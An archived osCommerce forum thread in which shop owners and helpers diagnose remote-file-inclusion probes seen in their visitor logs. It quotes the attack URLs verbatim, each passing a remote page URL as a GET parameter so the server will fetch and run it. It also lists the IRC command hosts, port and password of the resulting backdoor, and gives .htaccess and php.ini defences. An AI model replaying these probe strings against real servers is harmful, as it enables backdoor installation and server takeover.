Jump to content

Archived

This topic is now archived and is closed to further replies.

WoodsWalker

Weird Stuff in "Who's Online"

Recommended Posts

From the little I know, I suppose these are attempts to redirect your site visitors to something irrelevant, or even harmful. As other contributors to this thread have mentioned, these "script kiddies" who spend their time making these hack attempts usually cause more annoyance than harm. We've all heard tales of them hacking into, well, something like the CIA site so that visitors are redirected to a picture of a bunny rabbit or what-have-you. And then they can say, HA HA - we're smarter than those pencil-necks at the Pentagon.

 

I just want to sell my widgets.

Share this post


Link to post
Share on other sites

There was an exploit of the osCommerce redirect.php file, which allowed your website to act as an open redirect. There was no check performed to see if the sort of link being talked about came from inside or outside of your website. This was plugged back in 2005, but the automated programmes used by hackers still look for it simply because there are so many people who fail to update their old websites.

 

Vger

Share this post


Link to post
Share on other sites

So ... when we see those weird URLs in our Who's Online lists, it might be hackers trying, unsuccessfully, to find that old vulnerability?

 

I guess, as you've said, there's no danger as long as we're using an up-to-date osC version.

Share this post


Link to post
Share on other sites
So ... when we see those weird URLs in our Who's Online lists, it might be hackers trying, unsuccessfully, to find that old vulnerability?

 

I guess, as you've said, there's no danger as long as we're using an up-to-date osC version.

 

I hope so! I added that security pro to prevent injection hacks. I cant tell if it is doing anything but it's in there at least. Very easy mod, took me maybe 10 minutes at the most.

Share this post


Link to post
Share on other sites

I'm getting that too. It's from IP 207.112.76.81, and here's the link.../product_info.php?products_id=http://calebsbirth.pisem.su/mybaby.htm?

 

Strange, I'm just going to block that IP address.

It's from Canada.

 

Rob

Share this post


Link to post
Share on other sites
I'm getting that too. It's from IP 207.112.76.81, and here's the link.../product_info.php?products_id=http://calebsbirth.pisem.su/mybaby.htm?

 

Strange, I'm just going to block that IP address.

It's from Canada.

 

Rob

 

If you block it chances are you are going to block other legitimate customers that may originate from that same server. If you watch your who's online you will start to notice it comes from random ips so you would be fighting a losing battle trying to block everyone of them. I get between 4000 and 5000 uniques a month on my site now and I wouldn't want to lose a portion of that by blocking an ip.

Share this post


Link to post
Share on other sites
Hi Folks,

 

Every now and then when I look at "Who's Online", under "Last URL" I see this:

 

/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?

 

or something similar.

 

I have no such paths in my site.

 

I checked what was at http://babycaleb.fortunecity.co.uk/index.htm, at peril of getting viruses, and it looked like a legit page of baby pictures (but who knows?).

 

The IP Address of this entry was 65.93.226.125, which turned out to be a not-particularly-suspicious address from Bell Telephone in Toronto.

 

Anyone seen this kind of thing? Know what it is?

 

Thanks,

~Wendy

I am new here and not a user of osCommerce (yet?) but I have been trying to find out more information on this "Baby Caleb" url. I have seen 3-4 different version of this url try and attach themselves to various parts of my website. I have not yet found any maliscious code or JS files. But the link you have given above is not just for a page with three or four images of a baby and his mom, but rather there is actually a whole section of the page that you cannot see because it is written in white text on a white background. Check the soucre code and you will see it. It is some type of encrypted script at the bottom of that page. I haven't figured out what exactly it is or does so if any of you can figure it out that would be wonderful as I am afraid it is doing unspeakable thinkgs to my website.

 

Brennan the Vyper

Share this post


Link to post
Share on other sites

the white text on a white background is nothing to worry about. in fact, its the script that you mentioned, displayed in the webdings font so it just looks like a bunch of garbage. so going to the site by itself does nothing.

 

however, after looking at the script i can say that it's very dangerous. it gives them a back door into your site. using it, they can scan for files, run system commands, send emails, create and delete directories and files and basically do anything they want.

 

you say you're not using osc. what are you using? and what is the exact url that the hacker is using to run the script? somehow, the contents of that page are being downloaded by your server and then executed -- which runs their script, which is what's causing the problem.

 

the script is enclosed within the shorthand <? and ?> tags, not the longer <?php tag. can you get your host to turn off recognizing <? as a php tag? that will at least stop the execution of the script until you can plug up the hole on your site that is allowing them to download the contents of their page and execute it.

 

feel free to contact me if you want more help in getting rid of this.

Share this post


Link to post
Share on other sites

Hi Dave,

 

I don't know about Brennan the Vyper, but I myself use osC (the original post is mine), and I just see this URL

 

/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?

pop up occasionally in my Who's Online, under Last Visited Page.

 

Am I in any danger?

 

Thanks,

~Wendy

Share this post


Link to post
Share on other sites
Hi Dave,

 

I don't know about Brennan the Vyper, but I myself use osC (the original post is mine), and I just see this URL

 

/catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm?

pop up occasionally in my Who's Online, under Last Visited Page.

 

Am I in any danger?

 

Thanks,

~Wendy

Thanks Dave, My webhost has had the PHP shorthand <? ?> turned off for a while. The URL pops up in my counter script as a new page, usually something like http: // vyperphotos . com / gallery . php?="Baby Caleb URL". My host says he hasn't noticed any odd behavior from my site but that doesn't say much.

Share this post


Link to post
Share on other sites

A client sent me an email regarding this and asked me to research the exploit and make sure that his store was not affected. Here are the details about the exploit and what you can do to avoid it:

 

What's happening is the attacker has automated scripts hitting random sites across the internet, looking for GET parameters in the sites' HTML source code. It then attempts to pass the URL of the attacker's website to these GET variables (like "Faq_item", "cat_id", etc) hoping that the PHP code opens and executes whatever is passed. In other words, I doubt that they find that many exploitable servers because that combination of requirements isn't common.

 

The babycaleb website that's being passed may look innocent but when you look at the HTML source code you'll find a PHP script that gets injected into vulnerable sites. The PHP code is obfuscated, but I was able to decode most of it.

 

Basically what happens is when their automated bot finds an exploitable site, the code gets executed and logs into an IRC server on port 8080 at one of the following URLS at random (in case one goes down, I assume):

 

mcar.dd.blueline.be

mcarlos.opendns.be

ballslessman.weedns.com

homelessman.weedns.com

1.ns03.americanunfinished.com

ns10.suroot.com

burningman.weedns.com

mcarlos.dnip.net

 

Port: 8080

Channel: ##-u

Password: secretpass

 

(Note that 3 out of the 8 have the name "mcar" or "mcarlos" in the URL)

 

At this point the script will continuously loop, waiting for commands from someone logged into that IRC server. The script gives the attacker complete control over the server and would allow them unlimited access. They could list all files in your site, delete files, execute code, install applications, etc.

 

The way it is designed there is no way to know if someone has exploited your website until they begin making changes within your site. It is possible that you could detect them if there are PHP processes that are hours old, but that would be very difficult on a shared server to see. But again, it's very doubtful that they were successful on any of your sites because it would require a very very badly written PHP file that executes whatever command is passed in the GET variables for this to work.

 

My only suggestion to avoid being exploited is to add this untested bit of code to your .htaccess file:

RewriteEngine On
RewriteCond %{QUERY_STRING} https?://
RewriteRule .* - [F]

What it basically does is if "http://" or "https://" is found in any GET parameter passed to your site, the visitor will see a 403 Forbidden page. So even if you have an exploitable script on your site, they wouldn't be able to access it. Again, this is untested so make sure your store works after putting it in. This fix could possibly kill redirection scripts, but I'll leave that up to you all to figure out.


Please use the forums for support! I am happy to help you here, but I am unable to offer free technical support over instant messenger or e-mail.

Share this post


Link to post
Share on other sites

WOW, Brian - thanks very much for that comprehensive explanation. B) This has been worrying me and others for some time now.

 

Probably we're safe, as you say, but I'll try your code just to be safe. And I'll check to make sure everything is still working after I do it.

 

Thanks again,

~Wendy

Share this post


Link to post
Share on other sites

hi wendy,

 

like brian said, the hacker is looking for vulnerable sites. the specific vulnerability they're hoping to find is some code that would include a file name that is specified as the value of a get parameter. so your url of /catalog/index.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm would only 'work' if there was a include($_GET['cPath']) in the code. (that, and the host has enabled doing includes of http:// files instead of just local system files. this can be controlled via the php.ini file.) osc doesn't do that. for the most part, osc is pretty good about cleaning the contents of get parameters before using them, and i don't think there's any part of the code that will do an include with the value of a get parameter.

 

i did sent a note to fortune city telling them about the site and the fact that there's some malicious code on there. i have no idea if anyone will take note or even action about the site. and of course, there's nothing stopping the hacker from creating another one under a different name.

 

if you have the security pro add-on, then you are safe. if you have current osc code, you should also be pretty safe since the current code base (2.2RC2) doesn't have any code that is vulnerable to this type of exploit. *but* that's just the stock osc code. if you have a bunch of add-ons, who know what those are doing. some of the add-ons i've seen *do* use raw, unchecked $_GET values. so if you're concerned you should look at your own code and see if there is anything vulnerable to something like this.

Share this post


Link to post
Share on other sites

I installed the code as Brian said in my .htaccess file. At the same time I was monitoring the who's online in admin and watching nasty little BabyCaleb roam around. After the code was installed it was gone seconds after. I have been watching for about a hour on and off and so far so good. When someone attacks my site it is a big concern for me.

I had asked Brian to take a look and post what he finds. As usual he has done a good job. Everything seems to be fine.

Share this post


Link to post
Share on other sites

Thanks, everyone!

 

I'm glad finally to have some concrete information on this.

 

The only add-ons I have are Header Tags SEO, Who's Online Enhancement, SuperTracker, and Order Editor. I'll have a look in the code that was provided with them, but as they are very popular and widely used, I'd be surprised if they contained any sloppy code.

 

I wonder - I wouldn't be surprised if a PCI scan would also pick up this kind of vulnerability. I failed a scan during the summer, and the culprit was said to be a cross-site scripting vulnerability in osC's Advanced Search function. My site didn't really need this, so I simply removed the related files and then passed the scan.

 

Thanks again,

~Wendy

Share this post


Link to post
Share on other sites

OK, I've found a $_GET['cPath'] in the code that was installed with the SuperTracker contribution.

 

Here's the snippet where it occurs:

 

//If we are on index.php, but looking at category results, make sure we record which category
		  if (strpos($current_page, 'index.php')) {
			if (isset($_GET['cPath'])) {
				$cat_id = $_GET['cPath'];
				  $cat_id_array = explode('_',$cat_id);
				  $cat_id = $cat_id_array[sizeof($cat_id_array)-1];
				  $categories_viewed[$cat_id]=1;
			  }
		  }

		  $categories_viewed = serialize($categories_viewed);			
		  $query = "UPDATE supertracker set last_click='" . $last_click . "', exit_page='" . $current_page . "', num_clicks='" . $num_clicks . "', added_cart='" . $added_cart . "', categories_viewed='" . $categories_viewed . "', products_viewed='" . $products_viewed . "', customer_id='" . $cust_id . "', completed_purchase='" . $completed_purchase . "', cart_contents='" . $cart_contents . "', cart_total = '" . $cart_total . "', order_id = '" . $order_id . "' where tracking_id='" . $tracking_id . "'";
		tep_db_query($query);

	  }
	  else {

 

Is this dangerous? Does it depend on my host's policies?

 

Looks as if I should either remove this or make that mod to the .htaccess file.

Share this post


Link to post
Share on other sites

No, that code you posted is not exploitable.

 

From what I can tell, it doesn't target any specific GET parameter, but parses them out of your HTML source and tries them all. I wouldn't even bother worrying about it.

 

But the .htaccess change that I posted on the last page will completely remove any risk that you would be exploited by this. It will also keep these bots from appearing your Who's Online page.


Please use the forums for support! I am happy to help you here, but I am unable to offer free technical support over instant messenger or e-mail.

Share this post


Link to post
Share on other sites

Great! Thanks for the clarification. :D

 

I am now enlightened, as are the probably 50 other folks following this thread.

 

Thanks again, and have a marvellous weekend!

~Wendy

Share this post


Link to post
Share on other sites
OK, I've found a $_GET['cPath'] in the code that was installed with the SuperTracker contribution.

 

yeah, i was going to tell you that supertracker does have a few instances of using raw get variables, but you already found one.

 

as brian said, this isn't really dangerous, there'd have to be a include($_GET['cPath']) for there to be any danger, and osc doesn't do includes with any get variables ... as far as i know.

 

i know there's a way of turning off the ability to include 'remote files' as php calls this type of include. generally speaking, you shouldn't ever need to include a file that is not on the server's own file system. i'll look up how to do that and post a bit later. turning that capability off would disable this type of attack, but it won't stop hackers from trying it. you'll still see them on your who's online report. they'll just be wasting your bandwidth. but between that and brian's htaccess trick to block the url you would be quite safe from this type of attack.

Share this post


Link to post
Share on other sites

here's what you need to disable php from opening and/or including remote files. inside a php.ini on your machine, make sure the following two items are set:

 

allow_url_fopen = Off

allow_url_include = Off

 

as far as i know, osc does not make use of these at all, so it should be safe to set these off.

Share this post


Link to post
Share on other sites

Thanks, Dave!

 

Here's where I show what a noob I am: where would I find a php.ini file? My site is hosted on a shared server.

 

Thanks,

~Wendy

Share this post


Link to post
Share on other sites

hi wendy. sorry for taking a while to respond. i've been a bit busy with other things and haven't been posting much.

 

where your php.ini file is depends on your host. with some hosts, it's in your public_html directory. others allow this in any directory, so you'd probably want it in the lowest level directory that you have php files, so that'd be your "catalog" directory, or equivalent.

 

some hosts don't recognize it, but will allow you to make some php settings in a .htaccess file.

 

if you're in doubt, contact your host and ask them where the best place to put those settings would be. they should be able to point you in the right direction.

 

i hope that helps.

Share this post


Link to post
Share on other sites

×